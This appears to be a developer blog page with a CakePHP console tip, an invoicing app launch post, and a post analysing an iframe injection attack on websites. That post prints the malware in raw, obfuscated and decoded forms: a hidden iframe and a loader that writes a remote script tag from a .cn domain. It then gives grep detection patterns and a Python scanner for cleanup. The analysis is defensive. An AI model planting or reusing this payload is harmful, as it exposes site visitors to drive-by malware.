11 Dec

Quick Tip: Activate CakePHP console in one go

CakePHP

Here is a quick tip that will save you a few seconds if you use CakePHP on Windows. To run the CakePHP shell, you are probably doing it the ugly way, which involves copying the full path of the ‘app’ directory or of Cake’s console directory. To avoid this:

  1. Create a new separate directory somewhere on your machine (say 3rdpartytools)
  2. Create a batch file here called cake.bat with the following contents:

    @echo off

    ..\cake\console\cake %*

  3. Now, add this directory to your ‘Path’ variable (environment variable) from control panel.
  4. Restart windows and you’re done.

Now, to run the CakePHP shell, just open ‘cmd’ in your working app directory and type your favorite command, such as ‘cake schema generate -f’. What happens behind the scenes? Our own cake.bat is called when we issue a command, and it passes execution to the console’s cake.bat. Because the batch file uses a relative path, this works only when the current directory is an app directory that sits next to the cake directory.

Hope it saves you some time.

01 Dec

Invoice Dude – Free Online Invoicing for Small Businesses

Latest News, Our Apps

On Nov. 23, we launched our free online invoicing application called Invoice Dude, and I finally have the time to write about it. Invoice Dude is a free invoicing application that helps you bill your clients with ease, without spending any money or paying any kind of leasing fee. As we’re mostly into custom web development for clients, we had had the idea for almost a year, but it was only a few weeks back that our team finally committed to this project.

Invoice Dude is currently in a private beta phase (which means accounts are limited), and once we get out of it, we’re going to launch some add-ons. The add-ons list is not yet decided; however, we invite the community once again to take part in it and vote for the most needed add-ons.

We plan to launch similar projects in the near future and look forward to the community’s feedback. If you have any suggestions regarding the software, please tell us.

25 May

Reverse Engineering & removing new enhanced HTML Iframe Injection attack

Latest Developments

I’ve spent many hours lately fixing this ongoing iframe injection trend, and I’ve noticed one thing: every time our team fixes it, it comes back in a new, enhanced form which is difficult to delete automatically. The first time, it began with:

    <iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

    echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

After that, the code got better and less readable. The final version now looks like this:

    <!--
    (function(KWaP){var hSgtJ=':76a:72:20a:3d:22ScriptEngine:22:2c:62:3d:22:56:65rs:
    69on()+:22:2cj:3d:22:22:2cu:3dn:61vigato:72:2eus:65:72:41gent:3bif((u:2einde:78Of(:
    22Chrom:65:22):3c0:29:26:26(u:2e:69nd:65:78Of(:22Win:22):3e0):26:26(:75:2eindex:
    4ff(:22:4eT:206:22):3c0):26:26(d:6f:63um:65nt:2ecookie:2ei:6edex:4ff(:22miek:3d1:
    22):3c0):26:26:28:74y:70e:6f:66(:7arvz:74s:29:21:3dtyp:65:6ff:28:22A:22))):
    7bz:72:76zt:73:3d:22A:22:3be:76al(:22if(:77indow:2e:22+:61+:22)j:3dj+:22+:61+:22:
    4dajo:72:22+b+:61+:22Mi:6eo:72:22+b:2ba+:22B:75ild:22+:62+:22j:3b:22):
    3bdocument:2ewrite(:22:3c:73:63r:69:70:74:20src:3d:2f:2fma:22:2b:22rt:75z:2e:63n:
    2f:76i:64:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73cript:3e:22):3b:7d';
    eval(unescape(hSgtJ.replace(KWaP,'%')))})(/\:/g);
    -->

Let’s reverse engineer it for fun. See that little evil eval()? Replace it with alert(), or with a logger function such as Firebug’s console.log(). That will give us:

    <!--
    var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>");}
    -->

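That *.cn domain is back again. The decoded script checks the user agent (not Chrome, contains “Win”, not “NT 6”) and the absence of a “miek=1” cookie, then writes a script tag that loads from that domain, passing the script engine version as the id. To find this new injection, the common pattern you need to look for is: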

    3bdocument:2ewrite(:

Some other patterns you might want to check:

    document.write('<iframe

    www.zj5173.com

How to clean your website?

Use the ‘grep’ command, or a Windows tool such as PowerGrep, to search your files for these patterns. Another idea for advanced users facing these attacks is to use a version control tool and keep your site as a checked-out copy. The advantage of this method is that you’ll know all the modified files just by issuing a simple “svn status” command.

You can also contact us directly if you need assistance with this. We’ve helped secure 50+ websites in the last 3 months.
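
As an added example (not code from the original post), here is a small Python scanner for the cleanup step above. It looks for the literal markers listed in the post and also statically decodes quoted `:xx` strings, so a re-encoded variant that no longer contains the literal marker is still flagged. The file names, extensions, sample contents and the `placeholder.invalid` host are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Literal markers quoted in the post.
MARKERS = ["3bdocument:2ewrite(:", "document.write('<iframe", "www.zj5173.com"]
# A quoted string holding 8+ ":xx" hex pairs, the encoding used by the final variant.
COLON_HEX = re.compile(r"""['"]((?:[^'"\n:]*:[0-9a-fA-F]{2}){8,}[^'"\n]*)['"]""")
SUSPICIOUS = re.compile(r"document\.write\s*\(|<iframe|<script", re.I)
# Constructed sample files (assumption); placeholder.invalid is a stand-in host.
SAMPLES = {
    "about.html": "<p>Opening hours: 09:00 to 17:30</p>",
    "banner.js": "document.write('<iframe src=//placeholder.invalid/ width=1 height=1>');",
    "index.php": "<script>var s=':64ocument:2ewrite(:22:3cscript src:3d//placeholder"
                 ":2einvalid/:3e:3c/script:3e:22):3b';</script>",
}

def decode_colon_hex(blob):
    """Undo the ':' -> '%' + unescape() step statically; nothing is executed."""
    return unquote(re.sub(r":(?=[0-9a-fA-F]{2})", "%", blob), encoding="latin-1")

def scan_text(text):
    """Return (reason, evidence) findings for one file's contents."""
    hits = [("literal marker", m) for m in MARKERS if m in text]
    for match in COLON_HEX.finditer(text):
        decoded = decode_colon_hex(match.group(1))
        if SUSPICIOUS.search(decoded):
            hits.append(("decoded colon-hex payload", decoded[:80]))
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root and map each flagged relative path to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_text(path.read_text(encoding="latin-1"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            Path(root, name).write_text(body, encoding="latin-1")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Point `scan_tree()` at a copy of the web root; each finding shows the decoded text, so it can be reviewed before the file is cleaned.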
